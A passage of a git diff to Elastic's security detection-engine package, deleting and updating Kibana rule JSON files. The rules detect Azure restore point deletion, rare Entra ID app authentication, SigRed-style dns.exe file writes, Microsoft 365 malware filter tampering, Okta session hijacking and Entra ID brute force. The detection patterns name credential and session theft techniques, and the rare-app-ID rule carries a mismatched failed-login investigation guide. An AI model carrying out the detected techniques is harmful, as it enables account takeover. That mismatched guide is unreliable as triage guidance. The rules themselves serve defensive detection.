Routine administrative activities by infrastructure teams may trigger this alert when team members rotate or new administrators are onboarded. Create exceptions for known administrative accounts after verification.\n- Automated cleanup scripts or Azure policies that periodically remove old restore points may cause alerts. Identify and exclude service accounts used for these automated operations.\n- Planned decommissioning activities or migration projects may involve legitimate deletion of restore point collections. Document these activities and create temporary exceptions during known maintenance windows.\n- Testing and development environments may see frequent creation and deletion of resources. Consider excluding these environments from monitoring or adjusting the rule to focus on production resources only.\n\n### Response and remediation\n\n- Immediately verify the legitimacy of the deletion operation with the user or their manager. If the activity is unauthorized, proceed with incident response procedures.\n- If unauthorized deletion is confirmed, immediately isolate the affected user account to prevent further malicious activity. Reset credentials and review account permissions.\n- Check if the deleted Restore Point Collection can be recovered through Azure backup services or other recovery mechanisms.\n- Review and audit all recent activities performed by the affected user account to identify other potentially malicious actions.\n- Assess the impact on disaster recovery capabilities and inform relevant stakeholders about potential recovery limitations.\n- Review access controls and permissions for Restore Point Collection management, implementing principle of least privilege where necessary.\n- If ransomware activity is suspected, escalate to the security incident response team and implement broader containment measures, including checking for other indicators of ransomware such as deletion of Recovery Services vaults or backup fabric containers.\n- Document the incident and update detection rules or procedures based on lessons learned.\n", + "query": "event.dataset: azure.activitylogs and\n event.action: \"MICROSOFT.COMPUTE/RESTOREPOINTCOLLECTIONS/DELETE\" and\n event.outcome: (Success or success)\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/07/25/storm-0501-ransomware-attacks-expanding-to-hybrid-cloud-environments/" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "c1a3e2f0-8a1b-11ef-9b4a-f661ea17fbce_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json deleted file mode 100644 index da34ba0d695..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c766bc56-fdca-11ef-b194-f661ea17fbcd_1.json +++ /dev/null @@ -1,106 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity.", - "from": "now-9m", - "history_window_start": "now-14d", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Entra ID Rare App ID for Principal Authentication", - "new_terms_fields": [ - "azure.signinlogs.properties.user_principal_name", - "azure.signinlogs.properties.app_id" - ], - "note": "## Triage and analysis\n\n### Investigating Azure Entra ID Rare App ID for Principal Authentication\n\nThis rule identifies rare Azure Entra apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity.\n\n**This is a New Terms rule that focuses on first occurrence of the client `azure.signinlogs.properties.app_id` requesting authentication on-behalf-of the principal user `azure.signinlogs.properties.user_principal_name` in the last 14-days.**\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset: \"azure.signinlogs\" and event.category: \"authentication\"\n and azure.signinlogs.properties.is_interactive: false\n and azure.signinlogs.properties.user_type: \"Member\"\n and not azure.signinlogs.properties.client_app_used: \"Browser\"\n and not source.as.organization.name: \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n", - "references": [ - "https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.signinlogs.properties.client_app_used", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.is_interactive", - "type": "boolean" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.user_type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "c766bc56-fdca-11ef-b194-f661ea17fbcd", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "c766bc56-fdca-11ef-b194-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json b/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json deleted file mode 100644 index 7d8f68939e6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213.json +++ /dev/null @@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.file-*", - "logs-windows.sysmon_operational-*", - "endgame-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Unusual File Modification by dns.exe", - "note": "## Triage and analysis\n\n### Investigating Unusual File Modification by dns.exe\nDetection alerts from this rule indicate potential unusual/abnormal file writes from the DNS Server service process (`dns.exe`) after exploitation from CVE-2020-1350 (SigRed) has occurred. Here are some possible avenues of investigation:\n- Post-exploitation, adversaries may write additional files or payloads to the system as additional discovery/exploitation/persistence mechanisms.\n- Any suspicious or abnormal files written from `dns.exe` should be reviewed and investigated with care.\n", - "query": "file where host.os.type == \"windows\" and process.name : \"dns.exe\" and event.type in (\"creation\", \"deletion\", \"change\") and\n not file.name : \"dns.log\" and not\n (file.extension : (\"old\", \"temp\", \"bak\", \"dns\", \"arpa\") and file.path : \"C:\\\\Windows\\\\System32\\\\dns\\\\*\") and\n\n /* DNS logs with custom names, header converts to \"DNS Server log\" */\n not ?file.Ext.header_bytes : \"444e5320536572766572206c6f67*\"\n", - "references": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/", - "https://www.elastic.co/security-labs/detection-rules-for-sigred-vulnerability" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "windows", - "version": "^2.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "file.Ext.header_bytes", - "type": "unknown" - }, - { - "ecs": true, - "name": "file.extension", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1210", - "name": "Exploitation of Remote Services", - "reference": "https://attack.mitre.org/techniques/T1210/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 213 - }, - "id": "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9_213", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json b/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json deleted file mode 100644 index 5eefd64f264..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ca79768e-40e1-4e45-a097-0e5fbc876ac2_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection.", - "false_positives": [ - "A malware filter rule may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Malware Filter Rule Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Malware Filter Rule Modification\n\nMicrosoft 365 Exchange uses malware filter rules to protect email systems by identifying and blocking malicious content. Adversaries may attempt to disable or remove these rules to bypass security measures and facilitate attacks. The detection rule monitors audit logs for successful actions that alter these rules, signaling potential defense evasion tactics. This helps security analysts quickly identify and respond to unauthorized modifications.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.dataset:o365.audit entries with event.provider:Exchange to confirm the occurrence of the rule modification.\n- Identify the user account associated with the event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and verify if the action was authorized or expected.\n- Check the event.category:web logs for any related activities around the same timeframe to identify potential patterns or additional suspicious actions.\n- Investigate the event.outcome:success to ensure that the modification was indeed successful and assess the impact on the organization's security posture.\n- Correlate the identified actions with any recent security incidents or alerts to determine if this modification is part of a larger attack or threat campaign.\n- Review the user's recent activity and access logs to identify any other unusual or unauthorized actions that may indicate compromised credentials or insider threat behavior.\n\n### False positive analysis\n\n- Routine administrative changes to malware filter rules by authorized IT personnel can trigger alerts. To manage this, maintain a list of authorized users and their expected activities, and create exceptions for these users in the monitoring system.\n- Scheduled maintenance or updates to Microsoft 365 configurations might involve temporary disabling of certain rules. Document these activities and adjust the monitoring system to recognize these as non-threatening.\n- Automated scripts or third-party tools used for system management may perform actions that resemble rule modifications. Ensure these tools are properly documented and their actions are whitelisted if verified as safe.\n- Changes made during incident response or troubleshooting can appear as rule modifications. Coordinate with the incident response team to log these activities and exclude them from triggering alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts and systems to prevent further unauthorized modifications to the malware filter rules.\n- Re-enable or recreate the disabled or removed malware filter rules to restore the intended security posture of the Microsoft 365 environment.\n- Conduct a thorough review of recent email traffic and logs to identify any potential malicious content that may have bypassed the filters during the period of rule modification.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems or accounts have been compromised.\n- Implement enhanced monitoring and alerting for any future attempts to modify malware filter rules, ensuring rapid detection and response.\n- Review and update access controls and permissions for administrative actions within Microsoft 365 to limit the ability to modify security configurations to only essential personnel.\n- Document the incident, including actions taken and lessons learned, to improve future response efforts and update incident response plans accordingly.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-MalwareFilterRule\" or \"Disable-MalwareFilterRule\") and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterrule?view=exchange-ps", - "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-malwarefilterrule?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "ca79768e-40e1-4e45-a097-0e5fbc876ac2_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json deleted file mode 100644 index 4ffce7f9b4c..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305.json +++ /dev/null @@ -1,56 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Device Token Hashes for Single Okta Session", - "note": "## Triage and analysis\n\n### Investigating Multiple Device Token Hashes for Single Okta Session\n\nThis rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.authentication_context.external_session_id` values can be used to pivot into the raw authentication events related to this alert.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - Authentication events have been filtered out to focus on Okta activity via established sessions.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n- Aggregate by `okta.actor.alternate_id` and `event.action` to determine the type of actions that are being performed by the actor(s) involved in this action.\n - If various activity is reported that seems to indicate actions from separate users, consider deactivating the user's account temporarily.\n\n### False positive analysis:\n- It is very rare that a legitimate user would have multiple device token hashes for a single Okta session as DT hashes do not change after an authenticated session is established.\n\n### Response and remediation:\n- Consider stopping all sessions for the user(s) involved in this action.\n- If this does not appear to be a false positive, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n // ignore authentication events where session and device token hash change often\n AND NOT event.action IN (\n \"policy.evaluate_sign_on\",\n \"user.session.start\",\n \"user.authentication.sso\"\n )\n // ignore Okta system events and only allow registered users\n AND (\n okta.actor.alternate_id != \"system@okta.com\"\n AND okta.actor.alternate_id RLIKE \"[^@\\\\s]+\\\\@[^@\\\\s]+\"\n )\n AND okta.authentication_context.external_session_id != \"unknown\"\n| KEEP event.action, okta.actor.alternate_id, okta.authentication_context.external_session_id, okta.debug_context.debug_data.dt_hash\n| STATS\n dt_hash_counts = COUNT_DISTINCT(okta.debug_context.debug_data.dt_hash) BY\n okta.actor.alternate_id,\n okta.authentication_context.external_session_id\n| WHERE\n dt_hash_counts >= 2\n| SORT\n dt_hash_counts DESC\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://support.okta.com/help/s/article/session-hijacking-attack-definition-damage-defense?language=en_US", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 47, - "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd", - "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Domain: SaaS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1539", - "name": "Steal Web Session Cookie", - "reference": "https://attack.mitre.org/techniques/T1539/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 305 - }, - "id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json index 56084a830e8..88143075e20 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json +++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json @@ -19,6 +19,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 47, "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd", "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json deleted file mode 100644 index 9ba042c2904..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." - ], - "from": "now-60m", - "interval": "15m", - "language": "esql", - "license": "Elastic License v2", - "name": "Microsoft Entra ID Sign-In Brute Force Activity", - "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Sign-In Brute Force Activity\n\nThis rule detects brute-force authentication activity in Entra ID sign-in logs. It classifies failed sign-in attempts into behavior types such as password spraying, credential stuffing, or password guessing. The classification (`bf_type`) helps prioritize triage and incident response.\n\n### Possible investigation steps\n\n- Review `bf_type`: Determines the brute-force technique being used (`password_spraying`, `credential_stuffing`, or `password_guessing`).\n- Examine `user_id_list`: Identify if high-value accounts (e.g., administrators, service principals, federated identities) are being targeted.\n- Review `login_errors`: Repetitive error types like `\"Invalid Grant\"` or `\"User Not Found\"` suggest automated attacks.\n- Check `ip_list` and `source_orgs`: Investigate if the activity originates from suspicious infrastructure (VPNs, hosting providers, etc.).\n- Validate `unique_ips` and `countries`: Geographic diversity and IP volume may indicate distributed or botnet-based attacks.\n- Compare `total_attempts` vs `duration_seconds`: High rate of failures in a short time period implies automation.\n- Analyze `user_agent.original` and `device_detail_browser`: User agents like `curl`, `Python`, or generic libraries may indicate scripting tools.\n- Investigate `client_app_display_name` and `incoming_token_type`: Detect potential abuse of legacy or unattended login mechanisms.\n- Inspect `target_resource_display_name`: Understand what application or resource the attacker is trying to access.\n- Pivot using `session_id` and `device_detail_device_id`: Determine if a device is targeting multiple accounts.\n- Review `conditional_access_status`: If not enforced, ensure Conditional Access policies are scoped correctly.\n\n### False positive analysis\n\n- Legitimate automation (e.g., misconfigured scripts, sync processes) can trigger repeated failures.\n- Internal red team activity or penetration tests may mimic brute-force behaviors.\n- Certain service accounts or mobile clients may generate repetitive sign-in noise if not properly configured.\n\n### Response and remediation\n\n- Notify your identity security team for further analysis.\n- Investigate and lock or reset impacted accounts if compromise is suspected.\n- Block offending IPs or ASNs at the firewall, proxy, or using Conditional Access.\n- Confirm MFA and Conditional Access are enforced for all user types.\n- Audit targeted accounts for credential reuse across services.\n- Implement account lockout or throttling for failed sign-in attempts where possible.\n", - "query": "FROM logs-azure.signinlogs*\n\n// Define a time window for grouping and maintain the original event timestamp\n| EVAL\n time_window = DATE_TRUNC(15 minutes, @timestamp),\n event_time = @timestamp\n\n// Filter relevant failed authentication events with specific error codes\n| WHERE event.dataset == \"azure.signinlogs\"\n AND event.category == \"authentication\"\n AND azure.signinlogs.category IN (\"NonInteractiveUserSignInLogs\", \"SignInLogs\")\n AND event.outcome == \"failure\"\n AND azure.signinlogs.properties.authentication_requirement == \"singleFactorAuthentication\"\n AND azure.signinlogs.properties.status.error_code IN (\n 50034, // UserAccountNotFound\n 50126, // InvalidUsernameOrPassword\n 50055, // PasswordExpired\n 50056, // InvalidPassword\n 50057, // UserDisabled\n 50064, // CredentialValidationFailure\n 50076, // MFARequiredButNotPassed\n 50079, // MFARegistrationRequired\n 50105, // EntitlementGrantsNotFound\n 70000, // InvalidGrant\n 70008, // ExpiredOrRevokedRefreshToken\n 70043, // BadTokenDueToSignInFrequency\n 80002, // OnPremisePasswordValidatorRequestTimedOut\n 80005, // OnPremisePasswordValidatorUnpredictableWebException\n 50144, // InvalidPasswordExpiredOnPremPassword\n 50135, // PasswordChangeCompromisedPassword\n 50142, // PasswordChangeRequiredConditionalAccess\n 120000, // PasswordChangeIncorrectCurrentPassword\n 120002, // PasswordChangeInvalidNewPasswordWeak\n 120020 // PasswordChangeFailure\n )\n AND azure.signinlogs.properties.user_principal_name IS NOT NULL AND azure.signinlogs.properties.user_principal_name != \"\"\n AND user_agent.original != \"Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0\"\n AND source.`as`.organization.name != \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n\n// Aggregate statistics for behavioral pattern analysis\n| STATS\n authentication_requirement = VALUES(azure.signinlogs.properties.authentication_requirement),\n client_app_id = VALUES(azure.signinlogs.properties.app_id),\n client_app_display_name = VALUES(azure.signinlogs.properties.app_display_name),\n target_resource_id = VALUES(azure.signinlogs.properties.resource_id),\n target_resource_display_name = VALUES(azure.signinlogs.properties.resource_display_name),\n conditional_access_status = VALUES(azure.signinlogs.properties.conditional_access_status),\n device_detail_browser = VALUES(azure.signinlogs.properties.device_detail.browser),\n device_detail_device_id = VALUES(azure.signinlogs.properties.device_detail.device_id),\n device_detail_operating_system = VALUES(azure.signinlogs.properties.device_detail.operating_system),\n incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type),\n risk_state = VALUES(azure.signinlogs.properties.risk_state),\n session_id = VALUES(azure.signinlogs.properties.session_id),\n user_id = VALUES(azure.signinlogs.properties.user_id),\n user_principal_name = VALUES(azure.signinlogs.properties.user_principal_name),\n result_description = VALUES(azure.signinlogs.result_description),\n result_signature = VALUES(azure.signinlogs.result_signature),\n result_type = VALUES(azure.signinlogs.result_type),\n\n unique_users = COUNT_DISTINCT(azure.signinlogs.properties.user_id),\n user_id_list = 